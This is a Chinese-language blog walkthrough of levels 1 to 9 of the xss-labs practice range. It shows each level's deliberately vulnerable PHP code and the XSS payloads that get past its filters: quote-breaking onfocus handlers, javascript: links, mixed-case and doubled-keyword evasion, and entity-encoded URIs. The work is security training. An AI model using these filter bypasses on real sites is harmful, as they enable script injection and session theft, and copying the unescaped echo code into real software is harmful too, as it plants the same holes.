xss-labs靶场测试

最新推荐文章于 2025-04-29 10:58:31 发布
最新推荐文章于 2025-04-29 10:58:31 发布
阅读量648 收藏 16
点赞数 11
CC 4.0 BY-SA版权
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74377868/article/details/146313355

目录

xss漏洞

攻击类型反射型XSS(非持久型):

存储型XSS(持久型):

DOM型XSS:

危害分析

靶场搭建 

Pass1:基础注入

Pass2:输入框注入

Pass3:事件注入

Pass4:引号类型

Pass5:a标签注入

Pass6(大小写绕过)

Pass7(双拼写)

Pass8(Unicode编码)

Pass9(指定字符绕过)

xss漏洞

  • 全称:跨站脚本攻击(Cross-Site Scripting),缩写为XSS(避免与CSS混淆)。
  • 原理:攻击者向网页中注入恶意脚本,当其他用户访问时,脚本在其浏览器中执行,从而窃取信息或进行其他攻击。
攻击类型
反射型XSS(非持久型):
  • 触发方式:恶意脚本通过URL参数传递,服务器直接返回包含脚本的页面。
  • 特点:需诱导用户点击恶意链接。
存储型XSS(持久型):
  • 触发方式:恶意脚本被保存到服务器(如数据库),用户访问正常页面时触发。
  • 特点:危害范围广,长期存在。
DOM型XSS:
  • 触发方式:完全在客户端处理,通过JavaScript操作DOM时引入恶意代码。
  • 特点:不经过服务器,难以检测。
危害分析
  • 会话劫持:窃取Cookie或Session ID,冒充用户身份。
  • 钓鱼攻击:伪造登录表单,诱导用户输入敏感信息。
  • 键盘记录:监控用户输入,窃取密码等数据。
  • 网页篡改:修改页面内容,传播恶意信息。

靶场搭建 

xss-labs下载地址:GitHub - do0dl3/xss-labs: xss 跨站漏洞平台

将下载的文件解压然后放在xp的www的目录下

Pass1:基础注入

查看网站源码,可以发现get传参name的值test插入了html里头,还回显了payload的长度

<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>

插入一段js代码,get传参

url?name=<script>alert()</script>

Pass2:输入框注入

尝试注入

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>

htmlspecialchars($str):进行了html实体转化 

"><script>alert('aaa')</script><"

Pass3:事件注入

尝试使用上一关的内容进行绕过,被转义,只能想想其他办法了

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>	
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>

看一下源码,果然被实体化了,但是htmlspecialchars函数只针对<>大于小于号进行html实体化,我们还可以利用其他方法进行xss注入,这里我们可以利用onfocus事件绕过

onfocus 事件是前端开发中用于处理元素获得焦点的常用事件。当用户通过点击、键盘(如 Tab 键)或代码(如 element.focus())使某个元素成为当前操作焦点时,该事件会被触发。

所以我们可以利用这个事件来绕过<>号的过滤已达到执行js的目的

' onfocus=javascript:alert() '

此时再点击这个input框,使其获得焦点,触发onfocus事件

Pass4:引号类型

使用上一关的结果进行注入,尝试失败

分析源码,发现外围是双引号,双包单了,不符合javascript 的onfocus事件绑定

切换payload为双引号即可

" onfocus=javascript:alert() "

Pass5:a标签注入

使用上一关的结果进行注入,尝试失败

查看源码

这里on被替换成了o_n,过滤了js的标签还有onfocus事件,虽然str_replace不区分大小写,但是有小写字母转化函数,所以就不能用大小写法来绕过过滤了,只能新找一个方法进行xss注入,这里我们用a href标签法

添加一个标签得闭合前面的标签,尝试注入

"><a href="javascript:alert();">xx</a><"

Pass6(大小写绕过)

使用上一关的结果进行注入,尝试失败

href变成hr_ef,查看源码,发现过滤了好多,看看大小写能不能绕过

OnFocus <sCriPt> <a hReF=javascript:alert()>

发现大小写没有被过滤

//第一种,脚本注入
" ><SCRIPT>alert()</SCRIPT>< "
//第二种,焦点事件
" ONDOCUS=javascript:alert() "
//a标签href属性的
"> <a HREF=javascript:alert()>x</a> <"

Pass7(双拼写)

老规矩,注入

查看源码不难发现,这里面进行了小写转化,将检测出来的on,script,href给删掉了,但是没有关系,我们可以利用双拼写来绕过,

  • 比如on,我们可以写成oonn,当中间on被删掉的时候,就变成了on
  • 比如script,可以写成scscriptipt,当script被删掉的时候,就变成了script

" ><sscriptcript>alert()</sscriptcript>< "

Pass8(Unicode编码)

老规矩

javascript:alert()

失败,查看源码发现对字符进行了强行转换,而且使用了强制小写字母

但是我们能利用href的隐藏属性自动Unicode解码,我们可以插入一段js伪协议

javascript:alert()

利用在线工具进行Unicode编码后得到,在线Unicode编码解码

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;

然后点击友情链接

Pass9(指定字符绕过)

不想写了

查看源码

当传入的参数不包含"http://"时,即其值为假(false),将触发if语句的执行。为了避免这种情况,我们需要在参数中添加"http://",并将其作为注释,以防止其被实际执行,这会影响到弹窗的显示。为了确保strpos函数能够返回一个数值,我们需要构造一个特定的输入(payload),使其满足函数的预期行为。

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;/* http:// */

落鹜秋水
关注
xss-labs靶场训练(10-13关)
ldzhhh的博客
05-23 1050
第十关 先用<script>alert(xss)</script>试试 这里发现一个隐藏的form表单,里面有3个隐藏的变量:t_link、t_history、t_sort。 把三个参数都传进去试试看: http://192.168.121.129/xss/level10.php?keyword=well done!&t_link=1&t_history=2&t_sort=3 发现t_sort可以传入参数,构造Payload: t_sort=<sc
xss-labs靶场
风过江南乱的博客
02-18 462
前言 靶场项目地址:https://github.com/do0dl3/xss-labs 题目 level1 直接传入弹个窗就行了 level1.php?name=<script>alert('xss')</script> level2 需写闭合前面的<input name=keyword value=" level2.php?keyword="><script>alert('xss')</script> level3
XSS漏洞:xss-labs靶场
sgdhshshhs的博客
03-20 898
如果直接将用户输入的包含这些特殊字符的内容插入到 HTML 文档中,可能会导致 HTML 结构被破坏,甚至会被攻击者利用进行 XSS 攻击。这样,浏览器会将这些 HTML 实体当作普通文本显示,而不会将其解析为 HTML 标签或执行其中的脚本,从而保证了页面的安全性。发现双引号被编码了,但是下面的input中的只是将onclick进行了替换。但是,下面的keyword中的value没有被编码,可以考虑从这里入手,发现输入的内容不合法,查看源代码,发现其对输入的内容进行了判断。
xss-labs靶场搭建+实战(纯小白向)
最新发布
A_fish_like_sing的博客
04-29 1413
先下载phpstudy,往下翻到立即下载,下载64位后解压(路径最好不要有中文)双击exe文件下载,下载成功后打开我们可以先·启动一下apache,然后浏览器网址键入localhost看看这个界面说明没啥问题,如果加载不出来可以选择换个浏览器再试试其中mysql套件如果启动不了的话看看本地是否已经有mysql冲突了,关闭本地mysql的服务即可。
【网络安全 --- xss-labs靶场通关(11-20关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-23 2731
【网络安全 --- xss-labs靶场通关(11-20关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
WEB渗透学习-XSS-labs靶场
04-20
**XSS(跨站脚本攻击)学习指南:XSS-labs靶场详解** XSS,全称为Cross-Site Scripting,是网络安全领域常见的漏洞类型之一。它允许攻击者通过注入恶意脚本到Web页面中,进而对用户浏览器进行操控。XSS-labs是一个...
xss-labs靶场通关详解 XSS (Cross Site Scripting) 攻击是一种常见的网络攻击类型,它允许攻击者在受害者的浏览器中执行恶意脚本
04-17
xss-labs靶场通关详解 XSS (Cross Site Scripting) 攻击是一种常见的网络攻击类型,它允许攻击者在受害者的浏览器中执行恶意脚本。为了帮助开发人员更好地理解和防御这种攻击,有许多在线靶场XSS-Labs提供了一系列...
XSS-labs靶场练习-持续更新中
09-09
通过靶场练习,新手可以逐步了解和掌握识别XSS注入点、构造攻击载荷、绕过防护机制等技能,进而提升网络安全防护水平。 识别XSS注入点的关键在于寻找用户交互界面。在这些界面输入JavaScript语言片段后,若页面有...
xss-labs-master.zip(xss注入通关游戏/靶场
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
Web渗透-XSS漏洞深入及xss-labs靶场实战
Varin
06-24 2827
xss全称(cross site scripting)跨站脚本攻击,是最常见的web应用程序安全漏洞之一,位于owasptop102013年度第三名xss是指攻击者在网页中嵌入客户端脚本,通常是javascrip编写的危险代码,当用户使用浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的
XSS漏洞靶场---(复现)
a1852384503的博客
03-21 708
htmlspecialchars($str, ENT_QUOTES, 'UTF-8'):该函数把字符串中的特殊字符(如 <、>、"、' 等)转换为 HTML 实体(如 <、>、"、' 等),如此一来,即使攻击者注入了恶意的 JavaScript 代码,这些代码也会以文本形式显示,而不会被浏览器执行。其中<、>都被编码成了html字符实体,恶意代码被编码了,只能从属性值中的恶意代码处进行突破了,,只需要将属性的引号和标签先闭合就可以了。过滤操作是基于小写关键词进行的,攻击者可以使用大小写混合的方式绕过过滤。
关于XSS靶场详解
sGanYu
08-11 1万+
xss测试链接 Level1 右击查看页面源码 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> window.alert = function() //这里是显示一条指定消息和一个确认按钮的警告框 { confir..
xss-labs靶场实战全通关详细过程(xss靶场详解)
热门推荐
金 帛的博客
07-13 5万+
xss靶场一到二十关通关详细教程
XSS靶场(史上最详细附带payload)
qq_34598847的博客
10-17 4815
Cookie 和 Session都是用来跟踪浏览器用户身份的会话方式,但是两者的应用场景不太一样。Cookie 一般用来保存用户信息 比如①我们在 Cookie 中保存已经登录过得用户信息,下次访问网站的时候页面可以自动帮你填写登录的一些基本信息;②一般的网站都会有保持登录也就是说下次你再访问网站的时候就不需要重新登录了,这是因为用户登录的时候我们可以存放了一个 Token 在 Cookie 中,下次登录的时候只需要根据 Token 值来查找用户即可(为了安全考虑,重新登录一般要将 Token 重写)
XSS靶场通关详解(1-18关)
cz020907020808的博客
06-07 2575
家人们,因为xss靶场比较简单,有些地方说的比较笼统,过关很容易,只需要多尝试就可以,但是学好就难了!
XSS Game靶场练习
qq_64338246的博客
08-17 1226
虽然这里又用了innerHTML,但是过滤了括号会导致无法触发函数,所以不能像第一关那样直接用img标签。这里用双引号闭合,让jeff=aaa正常执行(aaa可以换成别的),然后在后面继续执行弹出1337的命令。用location把编码的符号变成字符串,然后再用括号的替代品如%2528和%2529来进行绕过。实际操作时可以看到,网页在加载完成后,经过两秒会再加载一次,这里就是在进行submit的提交。这一关依旧是get传参,只是多了一个submit提交事件,配合定时器在两秒后自动提交。
xss-labs靶场的搭建和通关(1-18)
qq_53003652的博客
04-12 2543
这次的xsslabs通关耗费了挺多时间,由于本人才学疏浅,难免会有一些错误,希望大家能指正批评,如有疑问,可在下方留言,会第一时间进行回复!
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 7143
【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻
XSS-Labs靶场教程:一键部署、轻松入门
xss-labs靶场的源码提供了一个实际的攻击环境,让用户可以在不影响真实网站的情况下,进行XSS攻击的实验和测试。通过这种方式,可以加深对XSS攻击的理解,并且在实战环境中检测和改进防御措施的有效性。 在使用xss-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值